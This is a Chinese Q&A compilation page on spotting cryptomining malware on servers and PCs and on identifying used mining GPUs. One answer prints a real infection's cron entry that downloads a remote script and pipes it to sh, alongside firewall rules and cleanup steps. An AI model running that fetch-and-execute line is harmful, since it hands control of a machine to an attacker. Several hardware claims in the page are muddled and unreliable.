如何判断服务器是不是在挖矿
❶ 网警怎么查单位电脑挖矿
每部电脑挨个排查。
挖矿软件会占用电脑的大量运算资源和电力资源,而且会引起主管部门的关注。局域网内有电脑被安装了挖矿软件是一件让人很头疼的事情,对成百上千台电脑一台一台的进行排查简直就和大海捞针一样,需要耗费大量的时间和人力。因为局域网出口做了NAT网络地址转换,上级部门只能检测到公司的公网IP,所以只能靠公司内部的网管人员来排查具体的终端了。最笨的办法就是一台电脑一台电脑的检查,通过检查程序列表和任务管理器来找挖矿程序。
电脑挖矿通常是指比特币挖矿机,就是用于赚取比特币的电脑。这类电脑一般有专业的挖矿芯片,多采用烧显卡的方式工作,耗电量较大。用户用个人计算机下载软件然后运行特定算法,与远方服务器通讯后可得到相应比特币,是获取比特币的方式之一。
❷ 超算服务器是矿机吗
目前不算;据多家媒体报道,上周首次曝光的针对高性能计算实验室的攻击覆盖范围宽广,受害机构包括加拿大、中国、美国和欧洲部分地区(包括英国、德国和西班牙)的超算中心。安全专家表示,所有事件似乎都涉及攻击者使用从合法用户那里窃取的SSH凭据(SSH是一种加密网络协议,即使在不安全的网络上也可提供安全的远程登录),其中包括大学和机构的研究人员。
从目前各方披露的超算挖矿调查信息来看,经济因素依然是网络犯罪的第一动力。役使全球超级计算机和高性能计算系统的幕后黑手,很可能就是近年来从事加密货币“挖矿”的黑客,但是尚不清楚攻击者是否也有窃取数据或间谍活动的意图。
超级计算机和高性能集群为研究人员提供了强大的计算能力,但是,任何能够将加密采矿恶意软件植入超算环境的攻击者都可以把超算变成加密货币“矿机”。(编者按:这些黑客很清楚超算适合挖掘的特定“币种”,例如门罗币和“收益率”)。
5月11日,由德国巴登-符腾堡州的研究人员和10所大学组成的bwHPC联盟报告说,它遭受了“安全事件”,导致多个超级计算机和集群脱机。
同一天,由于“安全事件”,爱丁堡大学将英国国家高性能计算系统ARCHER下线,并指出类似事件也影响了欧洲其他地区的研究机构。
❸ 如何判断买的电脑是不是挖矿机
拆了,看内部的灰尘。如果有固态硬盘,可以看看固态硬盘的充电次数。
❹ 怎么知道自己的电脑,是不是在帮别人挖矿
经常查看系统进程和CPU使用率,一般电脑装了360以后桌面会有个悬浮窗,看看这个有没有异常就知道了
❺ 求助服务器被挖矿程序入侵,如何排查
新客户于最近向我们SINE安全公司咨询,说他的服务器经常卡的网站无法打开,远程连接
服务器的慢的要命,有时候PING值都达到300-500之间,还经常掉包,听客户这么一说,一般
会判断为受到了CC+DDOS混合流量攻击,再具体一问,说是机房那面没有受到流量攻击,这
就有点奇怪了,不是流量攻击,还导致服务器卡,网站无法打开,这是什么攻击?为了解决客
户服务器卡的问题,我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。
挖矿木马还设计了挖矿进程如果被客户强制停止后,会自动启动继续挖矿,达到不间断的挖矿,
仔细检查发现是通过设置了每个小时执行任务计划,远程下载shell挖矿木马,然后执行,检查
当前进程是否存在,不存在就启动挖矿木马,进行挖矿。
对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据,以及感染蠕虫的病
毒,如果数据被加密那损失大了,客户是做平台的,里面的客户数据很重要,找出挖矿木马后,
客户需要知道服务器到底是如何被攻击的? 被上传挖矿木马的? 防止后期再出现这样的攻击
状况。
通过我们安全工程师的安全检测与分析,发现该服务器使用的是apache tomcat环境,平台的开
发架构是JSP+oracle数据库,apache tomcat使用的是2016年的版本,导致该apache存在严重
的远程执行命令漏洞,入侵者可以通过该漏洞直接入侵服务器,拿到服务器的管理员权限,
SINE安全工程师立即对apache 漏洞进行修复,并清除木马,至此问题得以解决,客户服务器
一切稳定运行,网站打开正常。
❻ 怎么检查自己电脑有没有被人用来挖矿,比特币
挖矿都是烧的显卡,以下方法可以鉴定自己显卡是不是矿卡
1:通过肉眼来识别这个硬件究竟是不是矿卡 ,其实通过其他方式也可以测出,就比如说你到电脑里面去测矿卡的超频性能,去跟官方的数据进行对比,测矿卡供电的稳定性,也可以测出来是不是矿卡。
2:第一点是先看矿卡上面有没有什么特别脏特别多的灰尘,各种油渍,如果没有的话那证明卖家可能做了比较好的处理,或者不是矿卡。如果矿卡非常的脏的话,十有八九就是矿卡,那我们就要进行下一步的操作,就是拆开矿卡。
3:我们应该注意到是否有发票且带保修,保修基本是在全国各地的保修点都可以保修的,这种才不是矿卡。
(6)如何判断服务器是不是在挖矿扩展阅读
如何避免买到矿卡:尽量到淘宝京东的官方旗舰店买新卡,图便宜买二手显卡的话就不敢保证了。
如果实在预算有限,一定要购买二手显卡的话,也要尽量选择个人购买,切勿相信什么网吧倒闭,工作室或者公司倒闭,这种渠道大部分买过来的大部分都是矿卡,当然如果那个个人买家手里也有大量的显卡卖的话,那也要请谨慎对待,这种大概率也是矿卡。最后,也希望大家可以避免矿卡,买到自己心仪的显卡,开心游戏。
❼ 矿卡如何辨别
判断是不是矿卡只有两个办法:
矿卡最明显的标志是GPU核心背面的PCB电路板发黄,这是长时间满负荷工作导致的。
获取个温度曲线和运行时长就知道是不是挖矿了。这么高温度长时间运行又不采取高效降温的也只有矿场了。
显卡矿卡是什么意思?
所谓的矿卡就是挖矿的显卡,这里的“挖矿”是虚拟挖矿,一般有专业显卡来挖矿,挖到的矿其实就是比特币,用户用电脑下载挖矿软件然后运行特定算法,与远方服务器通讯后可得到相应比特币,多采用烧显卡的方式工作,所以耗电量较大。显卡矿卡通常都是ATI芯片的显卡,比特币倒闭了,那些矿工纷纷把自己平时挖矿的矿卡就拿出来当二手卖了。
矿卡与显卡的区别:
1、A卡7850以上尽量不要听信自用,成色看着好的,可以买
n卡 750ti流行这个显卡挖矿时候已经是好时机了,一般这种卡大量的都是在3月-5月左右买的卡,这种卡挖矿的算法,温度不高,功耗也不高
购买矿卡时候,不要去问商家矿了多久
矿卡与非矿卡,区分成色,不是说看看菊花就能看出来的,不光要看菊花,一定要看供电和pcb板子,严重的一眼就能看出来,再怎么水洗,也不可能把pcb矿成黄色变成正常颜色
还有就是经过我的观察,有些卡批次不一样电阻和电容是不一样的,有的本来电阻和电容就是黄色
不买矿卡的尽量别收二手了,新的也尽量不要买呢,返修货真的不少
❽ 阿里云服务器被挖矿了怎么办(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
❾ 如何查看电脑是否被植入了挖矿程序
如何判断自己的电脑是否被挖矿,怎样预防?
电脑开机后,所有程序都不打开的情况下。按Ctrl+ALT+Del调出任务管理器,在“进程”卡项中,查看CPU的使用情况。如果看到某个进程占用了大量的cpu使用情况,并且几分钟后都没有降低的趋势,这个程序就可能是病毒了。
想要预防自己的电脑被挖矿也很简单,只要安装正规的安全软件,使用安全的浏览器,添加安全合适的插件,就可以防止电脑被挖矿了。
当然,如果不浏览不正规不健康的网站,不下载盗版游戏,盗版软件等就更能从根源杜绝电脑被不法分子挖矿的风险。